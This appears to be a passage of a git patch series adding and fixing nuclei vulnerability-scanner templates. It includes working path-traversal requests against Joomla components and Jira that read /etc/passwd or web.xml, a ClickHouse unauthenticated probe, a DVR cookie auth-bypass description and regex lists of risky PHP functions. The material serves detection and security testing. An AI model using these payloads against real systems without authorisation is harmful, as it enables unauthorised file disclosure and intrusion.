/dev/null +++ b/cves/2010/CVE-2010-1601.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1601 + +info: + name: Joomla! Component JA Comment - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12236 + - https://www.cvedetails.com/cve/CVE-2010-1601 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 7a468632dcb9e656adc83f32047dd61732b12870 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?B=C3=B9i=20=C4=90=E1=BA=A1i=20Gia?= Date: Thu, 26 Aug 2021 10:45:56 +0700 Subject: [PATCH 1883/4083] Create CVE-2021-26086.yaml --- cves/2021/CVE-2021-26086.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/CVE-2021-26086.yaml diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml new file mode 100644 index 0000000000..b92aada5f3 --- /dev/null +++ b/cves/2021/CVE-2021-26086.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-26086 + +info: + name: Jira Limited Remote File Read + author: cocxanh + severity: medium + description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. + reference: | + - https://jira.atlassian.com/browse/JRASERVER-72695 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 + tags: cve,cve2021,jira,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "JiraImportProgressFilter" + part: body From 5472deb9b4b6ee53e31e6a3c4e26ec77fe14cfed Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 14:05:10 +0530 Subject: [PATCH 1884/4083] Update cs141-default-login.yaml --- default-logins/abb/cs141-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 25b6b8a36e..cb51eede2c 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -20,7 +20,7 @@ requests: Connection: close {"userName":"admin","password":"cs141-snmp"} - + - | POST /api/login HTTP/1.1 Host: {{Hostname}} From 39ce8ee5b2b59c628b5cc9815fd994af2ea87f6a Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 15:03:35 +0530 Subject: [PATCH 1885/4083] misc updates --- ...-happyaxis-disclosure.yaml => axis-happyaxis.yaml} | 11 +++++++---- technologies/apache-axis-detect.yaml | 6 ++++-- 2 files changed, 11 insertions(+), 6 deletions(-) rename exposures/files/{axis-happyaxis-disclosure.yaml => axis-happyaxis.yaml} (74%) diff --git a/exposures/files/axis-happyaxis-disclosure.yaml b/exposures/files/axis-happyaxis.yaml similarity index 74% rename from exposures/files/axis-happyaxis-disclosure.yaml rename to exposures/files/axis-happyaxis.yaml index 583eac2cef..193c3d184f 100644 --- a/exposures/files/axis-happyaxis-disclosure.yaml +++ b/exposures/files/axis-happyaxis.yaml @@ -1,10 +1,10 @@ -id: axis-happyaxis-disclosure +id: axis-happyaxis info: - name: axis-happyaxis-disclosure + name: Axis Happyaxis Exposure author: dogasantos severity: info - tags: axis,axis2,middleware + tags: axis,axis2,middleware,exposure,apache requests: - method: GET @@ -13,15 +13,18 @@ requests: - "{{BaseURL}}/axis/happyaxis.jsp" - "{{BaseURL}}/axis2-web/HappyAxis.jsp" - "{{BaseURL}}/happyaxis.jsp" + matchers-condition: and matchers: - type: word words: - "Axis Happiness Page" - "Axis2 Happiness Page" - - "java.vendor" - "Examining Application Server" + - "Examining Version Service" + - "Examining System Properties" condition: or + - type: status status: - 200 diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache-axis-detect.yaml index 03a5506ec6..2c9733d95c 100644 --- a/technologies/apache-axis-detect.yaml +++ b/technologies/apache-axis-detect.yaml @@ -5,14 +5,15 @@ info: author: dogasantos severity: info description: Axis and Axis2 detection - tags: axis2,middleware + tags: tech,axis2,middleware,apache requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/axis2/" - "{{BaseURL}}/axis/" - - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word @@ -24,6 +25,7 @@ requests: - "installation" - "Admin" condition: and + - type: status status: - 200 From 9ada252cdbb41a4281b9bc395b79da24f8cb9646 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 15:25:05 +0530 Subject: [PATCH 1886/4083] misc update --- cves/2021/CVE-2021-26086.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index b92aada5f3..5e33e1cde4 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -13,14 +13,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml" + - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "JiraImportProgressFilter" + - "" part: body + condition: and From 7a2138a8c809326e586a28e977bfb841ba28354d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 15:27:01 +0530 Subject: [PATCH 1887/4083] few updates --- cves/2021/CVE-2021-26086.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index 5e33e1cde4..d0462007ca 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -1,11 +1,11 @@ id: CVE-2021-26086 info: - name: Jira Limited Remote File Read + name: Jira Limited Local File Read author: cocxanh severity: medium description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. - reference: | + reference: - https://jira.atlassian.com/browse/JRASERVER-72695 - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 tags: cve,cve2021,jira,lfi From aad00bcb701ff1ea9a75799ebb1b131323c5ece1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 27 Aug 2021 07:09:32 +0700 Subject: [PATCH 1888/4083] Create CVE-2010-1659.yaml --- cves/2010/CVE-2010-1659.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1659.yaml diff --git a/cves/2010/CVE-2010-1659.yaml b/cves/2010/CVE-2010-1659.yaml new file mode 100644 index 0000000000..fb4d569289 --- /dev/null +++ b/cves/2010/CVE-2010-1659.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1659 + +info: + name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12426 + - https://www.cvedetails.com/cve/CVE-2010-1659 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 3d626fb16808c0613ca58f599a4a15a081a05462 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 27 Aug 2021 07:15:53 +0700 Subject: [PATCH 1889/4083] Create CVE-2010-1471.yaml --- cves/2010/CVE-2010-1471.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1471.yaml diff --git a/cves/2010/CVE-2010-1471.yaml b/cves/2010/CVE-2010-1471.yaml new file mode 100644 index 0000000000..b68e50d8b6 --- /dev/null +++ b/cves/2010/CVE-2010-1471.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1471 + +info: + name: Joomla! Component Address Book 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12170 + - https://www.cvedetails.com/cve/CVE-2010-1471 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From b9a7c3a97767ab52c5ceb759f850cb5bd309aab1 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Fri, 27 Aug 2021 14:08:17 +0800 Subject: [PATCH 1890/4083] Add: Unauth ClickHouse Disclosure --- network/clickhouse-unauth.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 network/clickhouse-unauth.yaml diff --git a/network/clickhouse-unauth.yaml b/network/clickhouse-unauth.yaml new file mode 100644 index 0000000000..cea0731268 --- /dev/null +++ b/network/clickhouse-unauth.yaml @@ -0,0 +1,24 @@ +id: clickhouse-unauth + +info: + name: Unauth ClickHouse Disclosure + author: lu4nx + severity: high + tags: network,clickhouse + +network: + - inputs: + # 0011436c69636b486f75736520636c69656e741508b1a9030007 is header + # 64656661756c74 = default + - data: 0011436c69636b486f75736520636c69656e741508b1a903000764656661756c7400 + type: hex + + host: + - "{{Hostname}}:9000" + + read-size: 100 + + matchers: + - type: word + words: + - "ClickHouse" From 419a957409456d3a9d491dacb522b99ffc28c01a Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Fri, 27 Aug 2021 10:43:24 +0300 Subject: [PATCH 1891/4083] Fixing errors in templates Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- cves/2018/CVE-2018-13380.yaml | 1 - cves/2019/CVE-2019-8937.yaml | 2 +- exposed-panels/sophos-fw-version-detect.yaml | 1 - file/perl/perl-scanner.yaml | 3 --- file/php/php-scanner.yaml | 3 --- misconfiguration/aem/aem-crx-bypass.yaml | 2 +- network/expn-mail-detect.yaml | 2 +- network/rdp-detect.yaml | 2 +- network/starttls-mail-detect.yaml | 2 +- vulnerabilities/lsoft/listserv_maestro_rce.yaml | 3 +-- vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- 11 files changed, 7 insertions(+), 16 deletions(-) diff --git a/cves/2018/CVE-2018-13380.yaml b/cves/2018/CVE-2018-13380.yaml index 7f1eafb134..d8cd9eb565 100644 --- a/cves/2018/CVE-2018-13380.yaml +++ b/cves/2018/CVE-2018-13380.yaml @@ -5,7 +5,6 @@ info: author: shelld3v severity: medium description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. - type: XSS reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 tags: cve,cve2018,fortios,xss diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index ee5c4a1fff..778a2e1312 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -4,7 +4,7 @@ info: name: HotelDruid 2.3.0 - XSS author: LogicalHunter severity: medium - refrense: https://www.exploit-db.com/exploits/46429 + reference: https://www.exploit-db.com/exploits/46429 tags: cve,cve2019,xss,hoteldruid requests: diff --git a/exposed-panels/sophos-fw-version-detect.yaml b/exposed-panels/sophos-fw-version-detect.yaml index 4805643d16..b76c34133b 100644 --- a/exposed-panels/sophos-fw-version-detect.yaml +++ b/exposed-panels/sophos-fw-version-detect.yaml @@ -20,7 +20,6 @@ requests: part: body regex: - "(\\d{2}.\\d{1,2}.\\d{1,2}.\\d{2,3})" - condition: and extractors: - type: regex part: body diff --git a/file/perl/perl-scanner.yaml b/file/perl/perl-scanner.yaml index d74c3647f4..61f5c05d9f 100644 --- a/file/perl/perl-scanner.yaml +++ b/file/perl/perl-scanner.yaml @@ -19,14 +19,12 @@ file: regex: - 'srand' - 'rand' - condition: or - type: regex regex: - 'getc' - 'readdir' - 'read' - 'sysread' - condition: or - type: regex # When using exec, it is important to be sure that the string being used does not contain relative paths elements (../ for example), or a null, which may cause underlying C calls to behave strangely. regex: @@ -104,4 +102,3 @@ file: regex: - 'gethostbyname' - 'gethostbyaddr' - condition: or diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index 59de13dc1e..4814ef5bdb 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -34,13 +34,11 @@ file: regex: - 'eval' - 'eval\((base64|eval|\$_|\$\$|\$[A-Za-z_0-9\{]*(\(|\{|\[))' - condition: or - type: regex # Avoid the use of exit or die() regex: - 'exit' - 'die' - condition: or - type: regex # Avoid the use of logical operators (ex. using and over &&) regex: @@ -62,7 +60,6 @@ file: - 'print_r' - 'vprintf' - 'sprintf' - condition: or - type: regex # Ensuring you're not using echo with file_get_contents regex: diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index 9fb5fd8006..31e4f967e5 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -29,7 +29,7 @@ requests: matchers: - type: word part: body - word: + words: - 'buildCount' - 'downloadName' - 'acHandling' diff --git a/network/expn-mail-detect.yaml b/network/expn-mail-detect.yaml index adc6613c1f..77402b1b1c 100644 --- a/network/expn-mail-detect.yaml +++ b/network/expn-mail-detect.yaml @@ -10,7 +10,7 @@ network: - inputs: - data: "65686c6f20636865636b746c730a" type: hex - read-size: 2048 + read-size: 2048 host: - "{{Hostname}}" diff --git a/network/rdp-detect.yaml b/network/rdp-detect.yaml index c2d8bd5395..a8e62c9e89 100644 --- a/network/rdp-detect.yaml +++ b/network/rdp-detect.yaml @@ -10,7 +10,7 @@ network: - inputs: - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" type: hex - read-size: 2048 + read-size: 2048 host: - "{{Hostname}}" diff --git a/network/starttls-mail-detect.yaml b/network/starttls-mail-detect.yaml index c337a57aba..372d47faba 100644 --- a/network/starttls-mail-detect.yaml +++ b/network/starttls-mail-detect.yaml @@ -10,7 +10,7 @@ network: - inputs: - data: "65686c6f20636865636b746c730a" type: hex - read-size: 2048 + read-size: 2048 host: - "{{Hostname}}" diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 93b0ddba80..3f04c30a27 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -21,5 +21,4 @@ requests: - 'LISTSERV Maestro\s+9\.0-[123456780]' - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - - 'Administration Hub [5678]' - condition: or \ No newline at end of file + - 'Administration Hub [5678]' \ No newline at end of file diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index d2e593583a..6af3338d7f 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -31,5 +31,5 @@ requests: - 200 - type: word - word: + words: - "root:" From 11a05a977b6c55d63d33dc90ee1ba2b1feb6691c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 27 Aug 2021 13:23:24 +0530 Subject: [PATCH 1892/4083] Update clickhouse-unauth.yaml --- network/clickhouse-unauth.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/clickhouse-unauth.yaml b/network/clickhouse-unauth.yaml index cea0731268..5dbabdf85b 100644 --- a/network/clickhouse-unauth.yaml +++ b/network/clickhouse-unauth.yaml @@ -14,6 +14,7 @@ network: type: hex host: + - "{{Hostname}}" - "{{Hostname}}:9000" read-size: 100 From e6bd5cc73a0615bee565f6029557d1c02e1c9c0a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 27 Aug 2021 09:15:22 -0500 Subject: [PATCH 1893/4083] Update php-scanner.yaml Add more interesting stuff. --- file/php/php-scanner.yaml | 122 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 122 insertions(+) diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index 4814ef5bdb..2b2c6b8991 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -9,10 +9,19 @@ info: file: - extensions: - html + - htm - phtml - php - php3 - php4 + - php5 + - phps + - cgi + - inc + - tpl + - test + - module + - plugin extractors: - type: regex @@ -121,3 +130,116 @@ file: # Avoiding the use of $http_raw_post_data regex: - '\\$http_raw_post_data' + - type: regex + # interesting functions for POP/Unserialize + regex: + - "__autoload" + - "__destruct" + - "__wakeup" + - "__toString" + - "__call" + - "__callStatic" + - "__get" + - "__set" + - "__isset" + - "__unset" + - type: regex: + # phpinfo detected + regex: + - "phpinfo" + - type: regex + # registerPHPFunctions() allows code exec in XML + regex: + - "registerPHPFunctions" + - type: regex + regex: + - "session_start" + - type: regex + # dBase DBMS + regex: + - "dbase_open" + - type: regex + # DB++ DBMS + regex: + - "dbplus_open" + - "dbplus_ropen" + - type: regex + # Frontbase DBMS + regex: + - "fbsql_connect" + - type: regex + # Informix DBMS + regex: + - "ifx_connect" + - type: regex + # IBM DB2 DBMS + regex: + - "db2_(p?)connect" + - type: regex + # FTP server + regex: + - "ftp_(ssl_)?connect" + - type: regex + # Ingres DBMS + regex: + - "ingres_(p?)connect" + - type: regex + # LDAP server + regex: + - "ldap_connect" + - type: regex + # msession server + regex: + - "msession_connect" + - type: regex + # mSQL DBMS + regex: + - "msql_(p?)connect" + - type: regex + # MsSQL DBMS + regex: + - "mssql_(p?)connect" + - type: regex + # MySQL DBMS + regex: + - "mysql_(p?)connect" + - type: regex + # MySQLi Extension + regex: + - "mysqli((_real)?_connect)?" + - type: regex + # Oracle OCI8 DBMS + regex: + - "oci|(_new?)|_connect|(n?|p?)logon" + - type: regex + # Oracle DBMS + regex: + - "ora_(p?)connect" + - type: regex + # Ovrimos SQL DBMS + regex: + - "ovrimos_connect" + - type: regex + # PostgreSQL DBMS + regex: + - "pg_(p?)connect" + - type: regex + # SQLite DBMS + regex: + - "sqlite_(p?)open" + - type: regex + # SQLite3 DBMS + regex: + - "SQLite3" + - type: regex + # Sybase DBMS + regex: + - "sybase_(p?)connect" + - type: regex + # TokyoTyrant DBMS + regex: + - "TokyoTyrant" + - type: regex + # XML document + regex: + - "x(ptr|path)_new_context" From 9b81c55efc0137f84f3a81cdeecb64ff7f186856 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 27 Aug 2021 09:17:57 -0500 Subject: [PATCH 1894/4083] Update php-scanner.yaml --- file/php/php-scanner.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index 2b2c6b8991..f99892c6da 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -143,7 +143,7 @@ file: - "__set" - "__isset" - "__unset" - - type: regex: + - type: regex # phpinfo detected regex: - "phpinfo" From 40371e83ccb72ffd15e4d696f7e73808e9bbaa57 Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Fri, 27 Aug 2021 11:40:18 -0700 Subject: [PATCH 1895/4083] Added CVE-2018-8719.yaml Template --- cves/2018/CVE-2018-8719.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2018/CVE-2018-8719.yaml diff --git a/cves/2018/CVE-2018-8719.yaml b/cves/2018/CVE-2018-8719.yaml new file mode 100644 index 0000000000..9406170aa3 --- /dev/null +++ b/cves/2018/CVE-2018-8719.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-8719 + +info: + name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure + author: LogicalHunter + severity: medium + description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information + reference: + - https://www.exploit-db.com/exploits/44371 + - https://vuldb.com/?id.115817 + - https://www.cvedetails.com/cve/CVE-2018-8719/ + tags: wordpress,cve2018,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "TXT" + - ".log" + condition: or + - type: word + words: + - 'Index of' \ No newline at end of file From c8d2e57e979b0997c40e68066aef8c15d05f2001 Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Fri, 27 Aug 2021 21:50:10 +0000 Subject: [PATCH 1896/4083] aws ecs container endpoint with juicy info --- .../aws-ecs-container-agent-tasks.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 miscellaneous/aws-ecs-container-agent-tasks.yaml diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml new file mode 100644 index 0000000000..26eb1b03c8 --- /dev/null +++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -0,0 +1,22 @@ +id: aws-ecs-container-agent-tasks + +info: + name: aws-ecs-container-agent-tasks + author: dogasantos + severity: info + tags: aws,docker + description: Aws container metadata content + reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html +requests: + - method: GET + path: + - "{{BaseURL}}/v1/metadata" + - "{{BaseURL}}/v1/tasks" + matchers-condition: and + matchers: + - type: word + words: + - "arn:aws:ecs" + - type: status + status: + - 200 From bb4e3c13cc5e35847632dfc533f46a0d6adc641a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 27 Aug 2021 21:14:24 -0500 Subject: [PATCH 1897/4083] Rename expsoed-adb.yaml to exposed-adb.yaml fix typo in template name --- network/{expsoed-adb.yaml => exposed-adb.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename network/{expsoed-adb.yaml => exposed-adb.yaml} (100%) diff --git a/network/expsoed-adb.yaml b/network/exposed-adb.yaml similarity index 100% rename from network/expsoed-adb.yaml rename to network/exposed-adb.yaml From e974732b389d121bcd7c67365c3a574390bf17fa Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Sat, 28 Aug 2021 02:51:21 -0700 Subject: [PATCH 1898/4083] Added CVE-2019-17503.yaml Template --- cves/2019/CVE-2019-17503.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-17503.yaml diff --git a/cves/2019/CVE-2019-17503.yaml b/cves/2019/CVE-2019-17503.yaml new file mode 100644 index 0000000000..c389965dd5 --- /dev/null +++ b/cves/2019/CVE-2019-17503.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-17503 + +info: + name: Kirona Dynamic Resource Scheduling - information disclosure + author: LogicalHunter + severity: medium + description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file + reference: + - https://www.exploit-db.com/exploits/47498 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17503 + tags: cve2019,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/osm/REGISTER.cmd" + - "{{BaseURL}}/osm_tiles/REGISTER.cmd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "DEBUGMAPSCRIPT=TRUE" + - "sql" + condition: or From ec2d746922fa1c903583b39fc657e6498493e2de Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 28 Aug 2021 16:55:39 +0700 Subject: [PATCH 1899/4083] Create CVE-2010-2035.yaml --- cves/2010/CVE-2010-2035.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2035.yaml diff --git a/cves/2010/CVE-2010-2035.yaml b/cves/2010/CVE-2010-2035.yaml new file mode 100644 index 0000000000..d34c0bda56 --- /dev/null +++ b/cves/2010/CVE-2010-2035.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2035 + +info: + name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34006 + - https://www.cvedetails.com/cve/CVE-2010-2035 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 210b3b4ef4bd3d697fab1029942ef8137a0e161d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 28 Aug 2021 17:24:20 +0700 Subject: [PATCH 1900/4083] Create CVE-2010-0985.yaml --- cves/2010/CVE-2010-0985.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-0985.yaml diff --git a/cves/2010/CVE-2010-0985.yaml b/cves/2010/CVE-2010-0985.yaml new file mode 100644 index 0000000000..8a68ba32ca --- /dev/null +++ b/cves/2010/CVE-2010-0985.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0985 + +info: + name: Joomla! Component com_abbrev - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10948 + - https://www.cvedetails.com/cve/CVE-2010-0985 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 5b0a50d514f1c8bf8c952596a0862f20c579a1a7 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:24:41 +0300 Subject: [PATCH 1901/4083] Add description and references --- cves/2018/CVE-2018-9995.yaml | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-9995.yaml b/cves/2018/CVE-2018-9995.yaml index e9d54e6159..5295623e85 100644 --- a/cves/2018/CVE-2018-9995.yaml +++ b/cves/2018/CVE-2018-9995.yaml @@ -3,7 +3,16 @@ info: name: DVR Authentication Bypass author: princechaddha severity: high - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-9995 + description: | + TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and + MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass + authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides + credentials within JSON data in a response. + reference: | + - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html + - http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html + - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/ + - https://www.exploit-db.com/exploits/44577/ tags: cve,cve2018,auth-bypass requests: From 79829ea185c17ac71c3e98a5e558f9023325d88c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:30:31 +0300 Subject: [PATCH 1902/4083] Better references --- cves/2016/CVE-2016-10956.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 35d01b2f9d..04a98f605e 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -5,7 +5,9 @@ info: author: daffainfo,0x240x23elu severity: high description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 + reference: | + - https://cxsecurity.com/issue/WLB-2016080220 + - https://wpvulndb.com/vulnerabilities/8609 tags: cve,cve2016,wordpress,wp-plugin,lfi requests: From 61ca2a3b56289697482adc2e709d0470fe3c8e00 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:32:10 +0300 Subject: 